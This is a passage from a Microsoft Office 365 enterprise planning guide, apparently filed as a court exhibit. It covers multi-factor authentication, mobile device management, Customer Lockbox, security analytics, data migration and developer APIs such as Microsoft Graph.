- Should the user lose the device, the person who finds it won't be able to use it unless he or she also knows the user's password.



Office 365 uses multi-factor authentication to help provide the extra security and is managed from the **Office 365 admin center**.

## Features

Office 365 offers the following subset of Azure multi-factor authentication capabilities as a part of the subscription:

- The ability to **enable and enforce multi-factor authentication** for end users
- The use of a **mobile app** (online and one-time password) as a second authentication factor
- The use of a **phone call** as a second authentication factor
- The use of a **Short Message Service (SMS)** message as a second authentication factor
- **Application passwords** for non-browser clients
- **Default Microsoft greetings** during authentication phone calls

## Feature comparison of versions

A form of multi-factor authentication is included with Office 365, but you can also purchase Azure Multi-Factor authentication that includes extended functionality.



The following table below provides a list of the features that are available in the various versions of Azure Multi-Factor Authentication.

| Feature | O365 MFA | Azure MFA |
|---|---|---|
| Administrators can protect accounts with MFA | ● | ● |
| Mobile app as a second factor | ● | ● |
| Phone call as a second factor | ● | ● |
| SMS as a second factor | ● | ● |
| App passwords for clients that don't support MFA | ● | ● |
| Admin control over authentication methods | | ● |
| PIN mode | | ● |
| Fraud alert | | ● |
| MFA Reports | | ● |
| One-Time Bypass | | ● |
| Custom greetings for phone calls | | ● |
| Customization of caller ID for phone calls | | ● |
| Event Confirmation | | ● |
| Trusted IPs | | ● |
| Suspend MFA for remembered devices (Public Preview) | | ● |
| MFA SDK | | ● |
| MFA for on-premises apps using MFA server | | ● |

## Resources

- [What is Azure Multi-Factor Authentication?](What is Azure Multi-Factor Authentication?)

- How Azure Multi-Factor Authentication works
- Plan for multi-factor authentication for Office 365 Deployments
- Set up multi-factor authentication for Office 365
- Sign in to Office 365 with a second verification method

# MDM for Office 365 (MDM)

Mobile Device Management for Office 365 can help you secure and manage mobile devices like iPhones, iPads, Androids, and Windows Phones used by licensed Office 365 users in your organization.

You can create mobile device management policies with settings that can help control access to your organization's Office 365 email and documents for supported mobile devices and apps. If a device is lost or stolen, you can remotely wipe the device to remove sensitive organizational information.

The following diagram shows what happens when a user with a new device signs in to an app that supports access control with MDM for Office 365. The user is blocked from accessing Office 365 resources in the app until they enroll their device.



## Policy settings for mobile devices

If you create a policy to block access with certain settings turned on, users will be blocked from accessing Office 365 resources when using a supported app. The settings that can block users from accessing Office 365 resources are in these sections:

- Security
- Encryption
- Jail broken
- Managed email profile

For example, the following diagram shows what happens when a user with an enrolled device isn't compliant with a security

setting in a mobile device management policy that applies to their device.



The user signs in to an app that supports access control with MDM for Office 365. They are blocked from accessing Office 365 resources in the app until their device complies with the security setting.

## Supported Devices

You can use MDM for Office 365 to secure and manage the following types of devices.

- Windows Phone 8.1+
- iOS 7.1 or later versions
- Android 4 or later versions
- Windows 8.1*
- Windows 8.1 RT*
- Windows 10**
- Windows 10 Mobile**

* Access control for Windows 8.1 and Windows 8.1 RT devices is limited to Exchange ActiveSync.

** Requires the device to be joined to Azure Active Directory and be enrolled in the mobile device management service of your organization.

If people in your organization use mobile devices that aren't supported by Mobile Device Management for Office 365, you might want to block Exchange ActiveSync app access to Office 365 email for those devices, to help make your organization's data more secure. Steps for blocking Exchange ActiveSync: See Manage device access settings.

## Choose between Exchange Active Sync and MDM for Office 365

| Feature | EAS | MDM for O365 |
|---|---|---|

| Device Configuration | | |
|---|:---:|:---:|
| Inventory mobile devices that access corporate apps | ● | ● |
| Full device wipe | ● | ● |
| Mobile device configuration settings | ● | ● |
| Self-service password reset (Cloud only users) | ● | ● |
| **Office 365** | | |
| Provides reporting on devices that do not meet IT policy | | ● |
| Group-based policies and reporting | | ● |
| Root and jailbreak detection | | ● |
| Selective wipe | | ● |
| Prevent access to corporate email and docs based upon device enrollment and policies | | ● |

## Choose between Intune and MDM for Office 365

Both MDM for Office 365 and Intune provide cloud-based solutions for managing devices in your organization.



| MDM for Office 365 | Microsoft Intune |
|---|---|
| **Cost** | |
| Included with many Office 365 commercial subscriptions. | Requires a paid subscription for Microsoft Intune or can be purchased with Enterprise Mobility Suite. |
| **How you manage devices** | |
| Manage devices using the Security and Compliance Center in Office 365. | If you use Intune by itself, you manage devices using the Intune admin console. If you integrate Intune with SCCM 2012, you use the Configuration Manager console to manage devices on-premises and in cloud. |
| **Devices you can manage** | |

| MDM for Office 365 | Microsoft Intune |
|---|---|
| iOS, Android, and Windows Phone. | iOS, Mac OS X, Android, Windows Phone, and Windows PCs. |
| **Key capabilities** | |
| Help ensure that Office 365 corporate email and documents can be accessed only on phones and tablets that are managed by your company and that are compliant with your IT policies. Set and manage security policies, like device level pin lock and jailbreak detection, to help prevent unauthorized users from accessing corporate email and data on a device when it is lost or stolen. Remove Office 365 company data from an employee's device while leaving their personal data in place. | MDM for Office 365 capabilities, plus: Help users securely access corporate resource with certificates, Wi-Fi, VPN, and email profiles. Enroll and manage collections of corporate-owned devices, simplifying policy and app deployment. Deploy your internal line-of-business apps and apps in stores to users. Ensuring security of data by helping to restrict actions like copy, cut, paste, and save as, to only those apps managed by Intune. Enable more secure web browsing using the Intune Managed Browser app. Manage PCs from the cloud with no infrastructure required using Intune, or connect Intune to Configuration Manager to manage all of your devices including PCs, Macs, Linux and UNIX servers, and mobile devices from a single management console. An Intune subscription also allows you to set up MAM (mobile app management) policies by using the Azure portal, even if people's devices aren't enrolled in Intune. |

## Resources

- Overview of built-in Mobile Device Management for Office 365
- Capabilities of built-in Mobile Device Management for Office 365
- Choose between MDM for Office 365 and Microsoft Intune
- Ways to do enterprise mobility
- Manage mobile devices in Office 365
- Create and deploy device security policies
- Wipe a mobile device in Office 365
- Frequently asked questions about Mobile Device Management for Office 365

# Customer Lockbox

Customer Lockbox ensures that no one at Microsoft can access customer content without the customer's explicit approval.

> *Customer Lockbox brings the customer into the approval workflow for access to customer content.*

For the purpose of maximizing data security and privacy for Office 365 customers, we have engineered the service to require nearly zero interaction with customer content by Microsoft employees.

> *Nearly all service operations performed by Microsoft are either fully automated so there is no human interaction, or the human involvement is abstracted away from Office 365 customer content.*

In the very rare instances someone may need access to customer content to resolve a customer issue. Today within Microsoft, **Lockbox** enforces access control through multiple levels of approval, providing just-in-time access with limited and time-bound authorization. In addition, all access control activities in the service are logged and audited.



**Customer Lockbox for Office 365**, provides unprecedented customer control over content residing in Office 365, so customers can be assured that their content will not be accessed by Microsoft employees without their explicit approval. It brings customers into the access approval loop, requiring the customer to provide explicit approval of access to their content by a Microsoft employee for service operations.



## How it Works

- Administrators in the customer's Office 365 environment are notified via email that there is a request for access.
- Office 365 Admin Center portal will also display requests that have been submitted to the customer for approval.
- Administrators in the customer's Office 365 environment can approve or reject Customer Lockbox requests.

- Microsoft can only proceed following approval of a Customer Lockbox request.
- If a customer rejects a Customer Lockbox request, no access to customer content will occur.
- If a user was experiencing a service issue that required Microsoft to access customer content in order to resolve (though such circumstances are expected to be extremely rare), then the service issue might simply persist. Microsoft would inform the customer of this outcome.
- Customer Lockbox requests have a default lifetime of 12 hours; after which they expire. Expired requests do not result in access to customer content.

## Resources

**Watch Videos** …

- [An Overview of Customer Lockbox in Office 365](#)

**Read** …

- [Announcing Customer Lockbox for Office 365](#)
- [Microsoft Mechanics: An Overview of Customer Lockbox in Office 365](#)

# Office 365 Advanced Security Management

The cloud offers many security benefits to organizations, but also raises new security considerations. It can also add to existing ones such as shadow IT, the use of software that is not formally sanctioned by the organization. **Office 365 Advanced Security Management**, a new set of capabilities powered by [Microsoft Cloud App Security](#) gives you greater visibility and control over your Office 365 environment.

Advanced Security Management includes:

- **Threat detection** - Helps you identify high-risk and abnormal usage, and security incidents.
- **Enhanced control** - Shapes your Office 365 environment leveraging granular controls and security policies.
- **Discovery and insights** - Get enhanced visibility into your Office 365 usage and shadow IT without installing an end point agent.

## Threat detection

Advanced Security Management enables you to set up **anomaly detection policies**, so you can be alerted to potential breaches of your network. Anomaly detection works by **scanning user activities and evaluating their risk against over 70 different indicators**, including sign-in failures, administrator activity and inactive accounts. For example, you can be alerted to impossible travel scenarios, such as if a user signs in to the service to check their mail from New York and then two minutes later is downloading a document from SharePoint Online in Tokyo.



Advanced Security Management also leverages **behavioral analytics** as part of its anomaly detection to assess potentially risky user behavior. It does this by understanding how users typically interact with Office 365, spotting anomalies and giving the anomalous activity a risk score to help IT decide whether to take further action.

## Enhanced control

Advanced Security Management lets you set up **activity policies** that can track specific activities. With out-of-the-box templates, IT can easily create policies that flag when someone is downloading an unusually large amount of data, has multiple failed sign-in attempts or signs in from a risky IP address. Policies can also be customized to your environment. Using activity filters, IT can look for the location of a user, device type, IP address or if someone is granted admin rights. Alerts can be created to notify an IT lead immediately via email or text message.



**Default activity policy templates that are included**

The policy templates that are included are the following:

- **Administrative activity from a non-administrative IP address** Alert when an admin user performs an administrative activity from an IP address that is not included in a specific IP range category.
- **User logon from a non-categorized IP address** Alert when a user logs on from an IP address that is not included in a specific IP range category.
- **Mass download by a single user** Alert when a single user performs more than 30 downloads within 5 minutes.
- **Multiple failed user log on attempts to an app** Alert when a single user attempts to log on to a single app, and fails more than 10 times within 5 minutes.
- **Logon from a risky IP address** Alert when a user logs on from a risky IP address to your sanctioned services. The **Risky** IP category contains, by default, anonymous proxies and TOR exits point.

After reviewing an alert and investigating a user's activities, IT may deem that the behavior is risky and want to stop the user from doing anything else. This can be done directly from the alert. Some activities may be deemed so risky that IT may want to immediately suspend the account. To help with this, IT can configure the activity policy so that an account is **automatically suspended** if that risky activity takes place.

Advanced Security Management also **shows which apps are connected to Office 365** in their environment, who is using them and the permissions they have. For example, if a user grants a scheduling application access to their Office 365 calendar data, IT will be able to see the details of the connection and revoke that application's permissions with one click if they deem it a security risk.

## Discovery and insights

Advanced Security Management also provides an **app discovery dashboard** that allows IT Pros to visualize your organization's usage of Office 365 and other productivity cloud services, so you can maximize investments in IT-approved solutions. With the ability to discover about 1,000 applications in categories like collaboration, cloud storage, webmail and others, IT can better determine the extent to which shadow IT is occurring in your organization. Advanced Security Management will also give you details about the top apps in each category. For example, you can see how much data is being sent to OneDrive for Business, Box, Dropbox and other cloud storage providers.



You can do all this without installing anything on device end points. To load the data into the dashboard, all you have to do

is take the logs from your network devices and upload them via an easy-to-use interface.

Many organizations allow users to connect apps to Office 365 without IT intervention to help them be more productive. The challenge is that it reduces the visibility and control that IT has over what apps are doing with the data. **App Permissions** as part of Office 365 Advanced Security Management can help mitigate that risk.

App Permissions provides information to IT about which applications in their network have access to Office 365 data, what permissions they have and which users granted these apps access to their Office 365 accounts.



Based on this information, IT admins can choose to approve the app or revoke its access to Office 365. If they choose to revoke permissions to the app, it will no longer be able to access the information for any of the users in the Office 365 tenant. App Permissions also makes it easy for IT admins to notify users who have installed the application that is going to be banned.

## Resources

- Blog post: Gain enhanced visibility and control with Office 365 Advanced Security Management
- Video: Introducing Advanced Security Management for Office 365
- Overview of Advanced Security Management in Office 365
- Get started with Advanced Security Management
- Create app discovery reports in Advanced Security Management
- Blog post: Enhanced control over third-party apps now available in Office 365

## Office 365 Secure Score

The Office 365 Secure Score is a security analytics tool that will help you understand what you have done to reduce the risk to your data in Office 365, and show you what you can do to further reduce that risk.

The core idea is that it is useful to rationalize and contextualize all of your cloud security configuration and behavioral options into **one simple, analytical framework**, and to make it very easy for you to take **incremental action** to improve your score

over time. Rather than constructing a model with findings slotted into critical, moderate, or low severity, we wanted to give you a non-reactive way to evaluate your risk and make **incremental changes** over time that add up to a very **effective risk mitigation plan.**

The Secure Score does not express an absolute measure of how likely you are to get breached. It expresses the extent to which you have adopted controls which can offset the risk of being breached.

> *No service can guarantee that you will not be breached, and the Secure Score should not be interpreted as a guarantee in any way.*

## Your Secure Score Summary

The **Score Summary** panel gives you your current Secure Score, and the total number of points that are available to you, given your subscription level, the date that your score was measured, as well as a simple pie chart of your score.



The score is calculated once per day. If you make a change to a measured action, the score will automatically update the next day. It takes up to 48 hours for a change to be reflected in your score.

## Risk Assessment

While the Secure Score is framed as a 'gamification' of your security, it is important to recognize that every action you take will mitigate a real-world threat. This panel shows you the top threats for your tenancy, given your particular configuration and behaviors. Make sure you read about and understand the risks you are mitigating every time you take an action.



Case 0:20-cv-60416-XXXX Document 1-14 Entered on FLSD Docket 02/26/2020 Page 89 of 117

## Compare Your Score

The **Office 365 Average Secure Score** is calculated from every Office 365 customer's Secure Score. You can use this panel to get a better sense of how your score stacks up against the average. The specific controls that are passed by any given customer are not exposed in the average, and your Secure Score is private.



## Take Action

Helping you figure out which actions to take to improve your score is the purpose of the Secure Score. There are three basic parts to the experience:

First, there is the **modeler**. Use the slider to figure out how many actions you want to review.



Second is the **action pane**. When you open this, you will see a description of the control, explaining why we think it is an effective mitigation, and what we observed about your configuration.



Thirdly, you will see a **remediation pane fly-out** that explains exactly what you are about to change, and how it will affect your users. The Launch Now link (which takes you to a separate security center now) will allow you to make the desired change right from the Secure Score experience.



## Score Analyzer

We wanted to make it easy for admins to analyze and report to their executives and stakeholders their progress on risk mitigation over time. The Score Analyzer experience allows you to review a line graph of your score over time, to export the audit of your control measurements for the selected day to either a PDF or a CSV, and to review what controls you have earned points for, and which ones you could take action on.



## Resources

- [Introducing the Office 365 Secure Score](#)
- Video: [An introduction to Office 365 Secure score](#)

## Threat Intelligence (*Preview*)

*Availability*: **first quarter of 2017**. Included as part of the **Office 365 Enterprise E5** plan and the new **Secure Productive Enterprise E5** offering.

Organizations are being targeted with increasingly sophisticated attacks. **Threat Intelligence** will help you proactively uncover and protect against advanced threats by analyzing billions of data signals across Office consumer and commercial services. Threat Intelligence also provides deep insights from cyber threat hunters to create a comprehensive view of malware trends around the world. In addition, we're integrating signals from Windows and Azure to help customers realize the full benefit of the Microsoft Cloud.



Security admins will see a dashboard with rich insights to do deep investigation of malware and will be able to integrate data with existing security management tools.

Threat Intelligence takes it a step further by alerting security admins and proactively creating and suggesting security policies to help protect you against malware. For example, if analytics show that attacks are happening in the financial industry, the service will alert customers in finance and related areas to the trend. Threat Intelligence will also dynamically create and suggest additional security policies to help protect you before they get to your network.

## Advanced Data Governance (*Preview*)

*Availability*: **first quarter of 2017**. Included as part of the **Office 365 Enterprise E5** plan and the new **Secure Productive Enterprise E5** offering.

**Advanced Data Governance** in Office 365 will help you manage the exploding volume and increasing complexity of corporate data. We're applying intelligence to help you achieve organizational compliance and automate data retention.

You'll be able to classify, set policy and take action on the data that is most relevant for your organization and industry, with recommendations driven by behavioral analysis and machine learning.



Advanced Data Governance will include the following capabilities:

- **Import**—Intelligently import only the data you need from on-premises and third-party archives using classifications such as age, data type, user or groups, sensitivity or importance.
- **Policies**—Policy recommendations are provided, based on machine assisted insights of your data, classifications, tenant, organization, industry, geography and more. Recommendations may include delete, move, encrypt or share.
- **Retention**—Intelligently preserve only what's important to you by using classifications such as keywords, age, data type, user or group, sensitivity, importance. Integration with line-of-business systems allows you to trigger retention based upon events, such as creation of a human resources record.

Advanced Data Governance will help organizations apply the right actions to preserve high value data and purge redundant or obsolete data.

# PLAN OFFICE 365 SECURITY & INFORMATION PROTECTION

**Office 365** includes many security and information protection capabilities. Microsoft **Enterprise Mobility + Security (EMS)** includes additional capabilities for protecting data, identities, and devices with Office 365. EMS includes Microsoft Intune and Azure Active Directory Premium. It can be challenging for large organizations to determine which capabilities to implement and in what order. The Plan for Office 365 security and information protection capabilities article provides help.

## Deciding which capabilities to use

Our cybersecurity consulting team recommends taking a methodical approach to planning and implementing security and information protection features. If you don't already have an established approach, here is a recommended starting point.

**Step 1: Set information protection standards**

First, agree on a set of standards that can be applied across your organization. Here is an example of what this can look like.

| A | Establish information protection priorities | The first step of protecting information is identifying what to protect. Develop clear, simple, and well-communicated guidelines to identify, protect, and monitor the most important data assets anywhere they reside. |
|---|---|---|
| B | Set organization minimum standards | Establish minimum standards for devices and accounts accessing any data assets belonging to the organization. This can include device configuration compliance, device wipe, enterprise data protection capabilities, user authentication strength, and user identity. |
| C | Find and protect sensitive data | Identify and classify sensitive assets. Define the technologies and processes to automatically apply security controls. |
| D | Protect high value assets (HVAs) | Establish the strongest protection for assets that have a disproportionate impact on the organizations mission or profitability. Perform stringent analysis of HVA lifecycle and security dependencies, establish appropriate security controls and conditions. |

**Step 2: Classify data by sensitivity level**

Three levels is a good starting point if your organization doesn't already have defined standards.

**Step 3: Map service capabilities to data sensitivity levels**

Some information protection capabilities apply broadly and can be used to set a higher minimum standard for protecting all

data. Other capabilities can be targeted to specific data sets for protecting sensitive data and HVAs.

This table includes an example of how capabilities can be mapped to data sensitivity levels. There are two examples for level 1 because the default service will meet this need for some organizations while others require greater protection.

| Level | Standard | Description |
|---|---|---|
| 1 | Data is encrypted and available only to authenticated users | This level of protection is provided by default for data stored in Office 365 services. Data is encrypted while it resides in the service and in transit between the service and client devices. For some organizations, this level of protection meets the minimum standard. |
| | Additional data and identity protection applied broadly | Capabilities such as multi-factor authentication (MFA), mobile device management, and Exchange Online Advanced Threat Protection increase protection and substantially raise the minimum standard for protecting devices, accounts, and data. Many organizations will require one or more of these features to meet a minimum standard. |
| 2 | Sophisticated protection applied to specific data sets | Capabilities such as Azure Rights Management (RMS) and Data Loss Protection (DLP) across Office 365 can be used to enforce permissions and other policies that protect sensitive data. |
| 3 | Strongest protection and separation | You can achieve the highest levels of protection with capabilities such as Customer Lockbox for Office 365, eDiscovery features in Office 365, and SQL Server Always Encrypted for partner solutions that interact with Office 365. Use auditing features to ensure compliance to policies and prescribed configurations. Not all organizations require the highest level of protection. |

## Protecting data on devices

Many organizations start by implementing controls to protect data on devices. Office 365 includes some built-in capabilities. Intune and Azure Active Directory Premium include additional

configurable capabilities for implementing conditional access and other access controls. For more information, see Controlling Access to Office 365 and Protecting Content on Devices.

This table summarizes the capabilities.

| | Office 365 | Intune |
|---|---|---|
| BYOD (not enrolled) | Basic multi-factor authentication capabilities for Office 365. | Enforce PIN and encryption requirements, as well as other policy settings, for applications accessing Office 365. Restrict actions like copy, cut, paste, and save as, to only apps managed by Intune. Enable secure web browsing using the Intune Managed Browser App. |
| Enrolled devices | Access control for Office 365 email and documents. Only mobile devices that are enrolled in MDM for Office 365 can access Exchange Online and SharePoint Online. | Configurable conditional access policies for Office 365 apply to SharePoint Online, OneDrive for Business, and Skype for Business. Configure secure access with certificates, |

| | Office 365 | Intune |
|---|---|---|
| | | Wi-Fi, VPN and email profiles. Keep managed computers secure by ensuring the latest patches and software updates are quickly installed. |

**Additional Azure Active Directory Premium capabilities**

Create access policies that evaluate the context of a user's login to make real-time decisions about which applications they should be allowed to access.

For example, you can require multi-factor authentication per application or only when users are not at work. Or you can block access to specific applications when users are not at work.

> **Microsoft Enterprise Mobility + Security (EMS)** is the only comprehensive solution designed to help manage and protect users, devices, apps, and data in a mobile-first, cloud-first world.
>
> Refer to the Enterprise Mobility + Security (EMS) section later in this document.

Case 0:20-cv-60416-AMC   Document 1-14 Entered on FLSB Docket 02/26/2020   Page 265 of
726
Case 0:20-cv-60416-XXX   Document 1-14   Entered on FLSB Docket 02/26/2020   Page 94 of
147

# MIGRATE YOUR ORG'S DATA TO OFFICE 365 ENTERPRISE

When you migrate an enterprise organization to Office 365, it's important to plan exactly what steps you want to take, when to perform them, and who will perform them.

## Migrate email to Office 365

Your organization can migrate email to Office 365 from other systems.

### Migrate mailboxes from Exchange Server

For migrations from an existing on-premises Exchange Server environment, an administrator can migrate all email, calendar, and contacts from user mailboxes to Office 365.



### Use Office 365 Import Service to migrate PST-files

If your organization has many large PST files, you can use the Office 365 Import Service to migrate email data to Office 365.



### Migrate email from another IMAP-enabled email system

You can use the Internet Message Access Protocol (IMAP) to migrate user email from Gmail, Exchange, and other email systems that support IMAP migration. When you migrate the user's email by using IMAP migration, only the items in the users' inbox or other mail folders are migrated. Contacts, calendar items, and tasks can't be migrated with IMAP, but they can be by a user.



### Have users import their own email

Users can import their own email, contacts, and other mailbox information to Office 365. See Migrate email and contacts to Office 365 for Business to learn how.



## Migrate files and folders

Before deciding on a migration strategy, it is vital that you perform an analysis of your current environment. This analysis should focus on those SharePoint workloads and content that you plan to move to SharePoint Online.

Office 365 provides the following methods for migrating multiple files to SharePoint Online.

- Use Microsoft's Fast Track service for tools and guidance to get your data migrated to the cloud.
- You can use the SPO migration API can be used to create migration import job to Office 365 and queue it up for later processing by a separate timer job.
- Use Windows PowerShell cmdlets for SPO Migration Public Preview to migrate content from an on-premises fileshare or an on-premises SharePoint Server site to Office 365.

Microsoft partners are also available to assist with migrating your SharePoint content to SharePoint Online using third-party tools. Before choosing the migration tool to migrate your SharePoint content, be sure to verify that the tool meets your migration requirements and that it supports all of the SharePoint artifacts you want to migrate.

## Move your OneDrive files from SharePoint 2013 to Office 365

Moving to OneDrive for Business on Office 365 involves a few one-time tasks. To move your files, do the following tasks in sequence:



1. Go to your SharePoint OneDrive for Business library
2. Sync your SharePoint Server 2013 OneDrive for Business library to your computer
3. Create a backup copy of the synced library folder on your computer
4. Stop syncing your SharePoint Server 2013 OneDrive for Business library
5. Sync your Office 365 OneDrive for Business library to your computer
6. Upload files to your synced Office 365 OneDrive for Business library

**Note**: Files you move from SharePoint Server 2013 to Office 365 don't retain their original metadata and, they are essentially recognized as new files. As a result, these files don't retain metadata details such as Modified and Modified By.

Also, refer to: Migrate OneDrive for Business document library files from on-premises SharePoint 2013 to Office 365 article.

### Resources

- Import PST files or SharePoint data to Office 365
- Encrypt and import PST files to Office 365 (network upload)
- Import unencrypted PST files to Office 365 (network upload)
- Use drive shipping to import PST files to Office 365 (drive shipping)
- Import SharePoint data to Office 365 (network upload and drive shipping)

## Migrate Skype for Business users

Learn how to migrate user settings and move users to Skype for Business Online in the Move users to Skype for Business Online article.

- Before actually moving the user to Office 365, you should first confirm that the user accounts are synchronized to the cloud, and assign them a license.
- Before you start migrating users to Skype for Business Online, you should backup the user data associated with the accounts to be moved.
- Before you begin to move users to Skype for Business Online, you may want to move a few pilot users to confirm that your environment is correctly configured. You can then verify that the features and services function as expected before attempting to move additional users.
- You can verify that the user was moved successfully by checking online user settings and features.

## Archiving third-party data

Office 365 has released a new feature that lets you import and archive third-party data from social media platforms, instant messaging platforms, and document collaboration platforms, to mailboxes in your Office 365 organization. Examples of third-party data sources that you can import to Office 365 include the following:

- **Social**: Twitter, Facebook, Yammer, and LinkedIn
- **Instant messaging**: Yahoo Messenger, GoogleTalk, and Cisco Jabber
- **Document collaboration**: Box and DropBox
- **Vertical industries**: Customer Relationship Management (such as Salesforce Chatter) and Financials (such as Thomson Reuters and Bloomberg)
- **SMS/text messaging**: BlackBerry

After third-party data is imported, you can apply Office 365 compliance features to this data.

The following illustration and description explain how the third-party data import process works.



1. Customer works with their partner of choice to configure a connector that will extract items from the third-party data source and then import those items to Office 365.
2. The partner connector connects to third-party data sources via a third-party API (on a scheduled or as-configured basis) and extracts items from the data source. The partner connector converts the content of an item to an email message format.
3. Partner connector connects to the Azure service in Office 365 by using Exchange Web Service (EWS) via a well-known end point.
4. Items are imported into the mailbox of a specific user or into a "catch-all" third-party data mailbox. Whether an item is imported into a specific user mailbox or to the third-party data mailbox is based on the following criteria:
   a) **Items that have a user ID that corresponds to an Office 365 user account**. If the partner connector can map the user ID of the item in the third-party data source to a specific user ID in Office 365, the item is copied to the Purges folder in the user's Recoverable Items folder. Users can't access items in the Purges folder. However, you can use Office 365 eDiscovery tools to search for items in the Purges folder.
   b) **Items that don't have a user ID that corresponds to an Office 365 user account**. If the partner connector can't map the user ID of an item to a specific user ID in Office 365, the item is copied to the Inbox folder of the third-party data mailbox. Importing items to the inbox allows you or someone in your organization to sign in to the third-party mailbox to view and manage these items, and see if any adjustments need to be made in the partner connector configuration.

## Resources

- Archiving third-party data in Office 365
- Enable or disable archive mailboxes in Exchange Online
- Place a mailbox on Litigation Hold
- Create or remove an In-Place Hold

# OFFICE 365 APPLICATION DEVELOPMENT

## Office 365 APIs

Whether you want to incorporate the richness of Office 365 data into your app, or create a custom experience within Office 365 itself, or use custom reports to keep your Office 365 Enterprise environment running smoothly, you can use the developer features below to achieve your goals.



**Integrate Office 365 data into your own apps**

You can create custom solutions that access and interact with all the richness of a user's Office 365 data—and you can build those solutions across all mobile, web, and desktop platforms.



- Office 365 APIs enable you to provide access to Office 365 data, including their mail, calendars, contacts, files, and folders. All right from within your app itself.
- Whether you're building web applications using .NET, PHP, Java, Python, or Ruby on Rails, or creating apps for Windows 8, Universal Apps, iOS, Android, or on another device platform. It's your choice.

See Office 365 API overview.

**Create custom experiences within Office 365**

Now, you can extend Office 365 itself. Customize how your data and experiences are displayed within and interact with Office 365 to provide a seamless user experience.



- Create a FileHandler add-in to control how SharePoint Online displays and interacts with your custom file types, including custom file type icons, file preview within the Office 365 UI, and opening the file type in a custom editor. And since FileHandler add-ins host their data and logic remotely, you can develop your add-in using the language, tools, and web development stack of your choice.
- Add your app to the app launcher to give it visibility and make it accessible right from the Office 365 home page. Take advantage of Azure AD single sign-on to provide seamless access to your app for authorized users.

**Analyze and manage the health of your Office 365 Enterprise environment**

Office 365 Enterprise provides administrators a variety of developer features to keep their domains and subscriptions effective and well-tuned.



- Access the Reporting web service to build reporting dashboards, charts, and graphs to help their organization manage their subscription usage.
- Use the Office 365 Service Communications API (preview) to retrieve real-time service health information and Message Center communications for the domains that they own or manage. This enables them to monitor service health, manage communications, and develop plans to respond to upcoming service maintenance.
- Use the Office 365 Management Activity API to retrieve information about various user, admin, system, and policy actions and events from Office 365 and Azure AD activity logs. Use this information to build solutions that provide monitoring, analysis, and data visualizations.

## How do the Office 365 APIs work?

The Office 365 APIs are REST services that provide access to high-value data from Office 365 services:

- Mail, calendars, and contacts from Exchange Online
- Files and folders from SharePoint Online and OneDrive for Business
- Users and groups from Azure AD

And with the simplicity of REST, you don't need any specialized Exchange, SharePoint, or Azure AD knowledge to access these services.

Select the language, development platform, and hosting environment you want. Build using any web language, including JavaScript, HTML5, Python, Ruby, PHP, and ASP.NET. Use Visual Studio, Eclipse, Android Studio, Xcode, or the IDE of your choice. Host your apps in Microsoft Azure or any cloud platform you choose.

Then use single sign-on with Azure AD to authenticate your users and let them access email, files, calendar, and user information, and the petabytes of data that are stored in Office 365.

First, set up your developer environment. Then start building your first iOS, Android, JavaScript or ASP.NET app that uses the Office 365 APIs.

## Resources

**Microsoft Virtual Academy Courses …**

- Office 365 Developer Overview
- Deep Dive into the Office 365 App Model
- Deep Dive: Integrate Office 365 APIs in Your Web Apps
- Advanced Web Development with the Office 365 APIs
- Advanced Web Development Using Angular with Office 365 APIs
- Getting Started with Mobile App Development with the Office 365 APIs

**Read …**

- Overview of developing on the Office 365 platform
- Set up your Office 365 development environment
- Office 365 app authentication and resource authorization
- Office 365 API sandbox
- Office 365 OAuth sandbox
- Office 365 API code samples and videos
- Resource reference for the Mail, Calendar, and Contacts REST APIs
- Get started with Office 365 Management APIs

## Microsoft Graph



Microsoft Graph exposes multiple APIs from Office 365 and other Microsoft cloud services through a single endpoint: https://graph.microsoft.com. Microsoft Graph simplifies queries that would otherwise be more complex.

You can use Microsoft Graph to:

- Access data from multiple Microsoft cloud services, including Azure Active Directory, Exchange Online as part of Office 365, SharePoint, OneDrive, OneNote, and Planner.
- Navigate between entities and relationships.
- Access intelligence and insights from the Microsoft cloud (for commercial users).

**Microsoft Graph development stack**



## Why use Microsoft Graph?

Keeping the end user experience at the center, the Microsoft Graph unlocks new productivity scenarios by:

- Enabling corporate IT to rapidly build solutions for employees.
- Enabling developers to build inline social experiences.
- Empowering partners to customize their Office experience and extend their apps with Office 365 data.

The Microsoft Graph, located at graph.microsoft.com, allows applications to access digital work and digital life data across the intelligent Microsoft cloud.

- **Consistent and unified.** Microsoft Graph provides a consistent and interlinked API for working with a wide variety of types of data across Microsoft services. Developers can traverse their organizational hierarchy, discover tasks and groups associated with those users, and use organizational insights to find active working relationships between teams.
- **Available on devices and services.** Microsoft Graph has a growing set of SDKs for devices and for services – so whether you're working on Android apps, creating a .net Azure web site, or building a Ruby service, you can quickly incorporate Graph data into your application.
- **Growing support for Hybrid and On-Premises.** Increasingly, Microsoft Graph will offer support hybrid deployments, meaning that organizations can flexibly expose on-premises and cloud services behind one consistent endpoint.

The articles in Getting started building Microsoft Graph apps section provide detailed guidance on how to build apps that connect to Microsoft Graph across a variety of languages and development platforms. Each article starts with a sample starter project for the appropriate platform, and walks you through adding functionality that authenticates the user and makes a sample request to have Microsoft Graph send an email from their account.

**SharePoint and Microsoft Graph API Beta now available**

> This functionality is an early developer preview and is only available through the Microsoft Graph API beta endpoint. The API design is likely to change as we incorporate feedback from developers.

The SharePoint API in Microsoft Graph supports the following core scenarios:

- Access to SharePoint **sites**, **lists**, and **drives** (via document libraries)
- Read-only support for **site** and **list** resources (no ability create new sites or lists)
- Read-write support for **listItems** and **driveItems**
- Address resources by SharePoint ID, URL, or relative path

The SharePoint API exposes three major resource types:

- Site *(top-level object)*
- List
- ListItem

Read Working with SharePoint sites in Microsoft Graph article for more information.

## Resources

- Microsoft Graph homepage
- Overview of Microsoft Graph

- Graph Explorer
- Samples & SDKs
- Nine samples showing how to connect to Office 365 using the Microsoft Graph API (iOS, PHP, Android, Ruby, Nodejs, Python, Angular, UWP, AspNewMVC)
- Four samples demonstrating common Microsoft Graph API operations (Angular, iOS, Android, UWP)

## SharePoint Online Development

### SharePoint Add-ins

SharePoint Add-ins are self-contained extensions of SharePoint websites that you create, and that run without custom code on the SharePoint server. There are two basic kinds of SharePoint Add-ins — **SharePoint-hosted** and **Provider-hosted**.

Build SharePoint-hosted or provider-hosted add-ins to use remote web applications, surface remote data, offload business logic, access SharePoint list data, integrate with Office applications and services, make SharePoint a portal for other applications, and more.

| SharePoint-hosted | Provider-hosted |
|---|---|
| Centered around SharePoint components including lists, pages, Web Parts, workflows, libraries, and more. | Centered around a remote web application or data source. |
| Business logic is JavaScript on custom SharePoint pages. | Business logic is mainly remote server-side code. |
| No server-side code. | Can include SharePoint components. |

- All SharePoint Add-ins are to solve a well-defined business problem.
